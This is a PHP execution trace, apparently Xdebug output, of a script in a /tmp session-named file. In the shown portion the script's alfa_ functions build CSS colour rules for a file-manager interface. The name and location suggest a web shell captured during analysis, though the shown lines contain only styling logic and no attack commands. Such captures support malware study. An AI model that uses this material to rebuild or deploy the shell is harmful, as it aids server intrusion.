5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_size{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_modify'
6	185	0	0.010067	437080	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_modify'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	185	1	0.010091	437080
6	185	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_modify{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_owner_group'
6	186	0	0.010152	437336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_owner_group'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	186	1	0.010177	437336
6	186	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_owner_group{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_green_perm'
6	187	0	0.010224	437336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_green_perm'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#25ff00'
6	187	1	0.010249	437336
6	187	R			'#25ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#25ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_green_perm{color: #25ff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_red_perm'
6	188	0	0.010296	437336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_red_perm'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FF0000'
6	188	1	0.010325	437336
6	188	R			'#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_red_perm{color: #FF0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_white_perm'
6	189	0	0.010372	437336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_white_perm'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FFFFFF'
6	189	1	0.010396	437336
6	189	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_white_perm{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'beetween_perms'
6	190	0	0.010443	437336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'beetween_perms'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FFFFFF'
6	190	1	0.010466	437336
6	190	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.beetween_perms{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_actions'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main .actions'
6	191	0	0.010524	437336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_actions'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.main .actions' => 'color: {color};']]
6	191	1	0.010555	437336
6	191	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	192	0	0.010579	437336	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	192	1	0.010595	437472
6	192	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main .actions{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'minimize_editor_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.minimized-wrapper'
6	193	0	0.010657	437312	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'minimize_editor_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0e304a', 'multi_selector' => ['.minimized-wrapper' => 'background-color: {color};']]
6	193	1	0.010688	437312
6	193	R			'#0e304a'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0e304a'
6	194	0	0.010713	437312	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0e304a'	'background-color: {color};'
6	194	1	0.010729	437464
6	194	R			'background-color: #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.minimized-wrapper{background-color: #0e304a;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'minimize_editor_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.minimized-text'
6	195	0	0.010795	437328	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'minimize_editor_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#f5deb3', 'multi_selector' => ['.minimized-text' => 'color: {color};']]
6	195	1	0.010826	437328
6	195	R			'#f5deb3'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#f5deb3'
6	196	0	0.010851	437328	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#f5deb3'	'color: {color};'
6	196	1	0.010866	437464
6	196	R			'color: #f5deb3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #f5deb3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.minimized-text{color: #f5deb3;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-explorer,.editor-modal'
6	197	0	0.010931	437568	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0e304a', 'multi_selector' => ['.editor-explorer,.editor-modal' => 'border: 2px solid {color};']]
6	197	1	0.010963	437568
6	197	R			'#0e304a'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0e304a'
6	198	0	0.010988	437568	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0e304a'	'border: 2px solid {color};'
6	198	1	0.011004	437720
6	198	R			'border: 2px solid #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 2px solid #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-explorer,.editor-modal{border: 2px solid #0e304a;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-explorer,.editor-modal'
6	199	0	0.011070	437584	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => ['.editor-explorer,.editor-modal' => 'background-color: {color};']]
6	199	1	0.011103	437584
6	199	R			'rgba(0, 1, 23, 0.94)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = 'rgba(0, 1, 23, 0.94)'
6	200	0	0.011130	437584	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'rgba(0, 1, 23, 0.94)'	'background-color: {color};'
6	200	1	0.011147	437760
6	200	R			'background-color: rgba(0, 1, 23, 0.94);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: rgba(0, 1, 23, 0.94);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-explorer,.editor-modal{background-color: rgba(0, 1, 23, 0.94);}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_header_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-header'
6	201	0	0.011215	437608	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_header_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => ['.editor-header' => 'background-color: {color};']]
6	201	1	0.011247	437608
6	201	R			'rgba(21, 66, 88, 0.93)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = 'rgba(21, 66, 88, 0.93)'
6	202	0	0.011274	437608	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'rgba(21, 66, 88, 0.93)'	'background-color: {color};'
6	202	1	0.011291	437784
6	202	R			'background-color: rgba(21, 66, 88, 0.93);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: rgba(21, 66, 88, 0.93);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-header{background-color: rgba(21, 66, 88, 0.93);}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_header_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-path'
6	203	0	0.011357	437608	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_header_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00ff7f', 'multi_selector' => ['.editor-path' => 'color: {color};']]
6	203	1	0.011388	437608
6	203	R			'#00ff7f'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00ff7f'
6	204	0	0.011413	437608	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00ff7f'	'color: {color};'
6	204	1	0.011428	437744
6	204	R			'color: #00ff7f;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #00ff7f;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-path{color: #00ff7f;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_header_button'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.close-button, .editor-minimize'
6	205	0	0.011494	437568	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_header_button'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#1d5673', 'multi_selector' => ['.close-button, .editor-minimize' => 'background-color: {color};']]
6	205	1	0.011526	437568
6	205	R			'#1d5673'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#1d5673'
6	206	0	0.011551	437568	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#1d5673'	'background-color: {color};'
6	206	1	0.011567	437720
6	206	R			'background-color: #1d5673;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #1d5673;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.close-button, .editor-minimize{background-color: #1d5673;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_actions'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor_actions'
6	207	0	0.011631	437840	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_actions'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.editor_actions' => 'color: {color};']]
6	207	1	0.011662	437840
6	207	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	208	0	0.011687	437840	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	208	1	0.011702	437976
6	208	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor_actions{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_file_info_vars'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor_file_info_vars'
6	209	0	0.011764	437824	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_file_info_vars'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.editor_file_info_vars' => 'color: {color};']]
6	209	1	0.011795	437824
6	209	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	210	0	0.011819	437824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	210	1	0.011835	437960
6	210	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor_file_info_vars{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_file_info_values'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.filestools'
6	211	0	0.011897	437824	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_file_info_values'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#67ABDF', 'multi_selector' => ['.filestools' => 'color: {color};']]
6	211	1	0.011927	437824
6	211	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#67ABDF'
6	212	0	0.011952	437824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#67ABDF'	'color: {color};'
6	212	1	0.011968	437960
6	212	R			'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.filestools{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_header'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.hheader-text,.history-clear'
6	213	0	0.012034	437824	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_header'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#14ff07', 'multi_selector' => ['.hheader-text,.history-clear' => 'color: {color};']]
6	213	1	0.012065	437824
6	213	R			'#14ff07'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#14ff07'
6	214	0	0.012090	437824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#14ff07'	'color: {color};'
6	214	1	0.012105	437960
6	214	R			'color: #14ff07;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #14ff07;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.hheader-text,.history-clear{color: #14ff07;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_list'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-file-name'
6	215	0	0.012167	437824	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_list'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#03b3a3', 'multi_selector' => ['.editor-file-name' => 'color: {color};']]
6	215	1	0.012199	437824
6	215	R			'#03b3a3'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#03b3a3'
6	216	0	0.012223	437824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#03b3a3'	'color: {color};'
6	216	1	0.012238	437960
6	216	R			'color: #03b3a3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #03b3a3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-file-name{color: #03b3a3;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_selected_file'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.is_active'
6	217	0	0.012299	437824	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_selected_file'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => ['.is_active' => 'background-color: {color};']]
6	217	1	0.012331	437824
6	217	R			'rgba(49, 55, 93, 0.77)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = 'rgba(49, 55, 93, 0.77)'
6	218	0	0.012358	437824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'rgba(49, 55, 93, 0.77)'	'background-color: {color};'
6	218	1	0.012374	438000
6	218	R			'background-color: rgba(49, 55, 93, 0.77);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: rgba(49, 55, 93, 0.77);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.is_active{background-color: rgba(49, 55, 93, 0.77);}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_file:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.file-holder > .history:hover'
6	219	0	0.012444	438376	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_file:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#646464', 'multi_selector' => ['.file-holder > .history:hover' => 'background-color: {color};']]
6	219	1	0.012476	438376
6	219	R			'#646464'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#646464'
6	220	0	0.012501	438376	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#646464'	'background-color: {color};'
6	220	1	0.012517	438528
6	220	R			'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.file-holder > .history:hover{background-color: #646464;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'input_box_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=text],textarea'
6	221	0	0.012587	438352	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'input_box_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['input[type=text],textarea' => 'border: 1px solid {color}']]
6	221	1	0.012619	438352
6	221	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	222	0	0.012644	438352	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color}'
6	222	1	0.012660	438504
6	222	R			'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=text],textarea{border: 1px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'input_box_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=text],textarea'
6	223	0	0.012725	438352	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'input_box_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#999999', 'multi_selector' => ['input[type=text],textarea' => 'color: {color};']]
6	223	1	0.012756	438352
6	223	R			'#999999'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#999999'
6	224	0	0.012781	438352	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#999999'	'color: {color};'
6	224	1	0.012796	438488
6	224	R			'color: #999999;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #999999;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=text],textarea{color: #999999;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'input_box:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=text]:hover,textarea:hover'
6	225	0	0.012859	438336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'input_box:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=text]:hover,textarea:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	225	1	0.012893	438336
6	225	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	226	0	0.012917	438336	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	226	1	0.012934	438512
6	226	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=text]:hover,textarea:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'select_box_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'select'
6	227	0	0.013004	438376	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'select_box_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['select' => 'border: 1px solid {color}']]
6	227	1	0.013035	438376
6	227	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	228	0	0.013060	438376	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color}'
6	228	1	0.013076	438528
6	228	R			'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'select{border: 1px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'select_box_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'select'
6	229	0	0.013141	438352	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'select_box_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFEE', 'multi_selector' => ['select' => 'color: {color};']]
6	229	1	0.013172	438352
6	229	R			'#FFFFEE'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFEE'
6	230	0	0.013197	438352	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFEE'	'color: {color};'
6	230	1	0.013213	438488
6	230	R			'color: #FFFFEE;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFEE;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'select{color: #FFFFEE;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'select_box:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'select:hover'
6	231	0	0.013273	438336	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'select_box:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['select:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	231	1	0.013306	438336
6	231	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	232	0	0.013330	438336	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	232	1	0.013347	438512
6	232	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'select:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'button_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=submit],.button,#addup'
6	233	0	0.013417	438376	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'button_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=submit],.button,#addup' => 'border: 1px solid {color};']]
6	233	1	0.013448	438376
6	233	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	234	0	0.013472	438376	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'border: 1px solid {color};'
6	234	1	0.013488	438528
6	234	R			'border: 1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=submit],.button,#addup{border: 1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'button:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=submit]:hover'
6	235	0	0.013553	438352	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'button:hover'
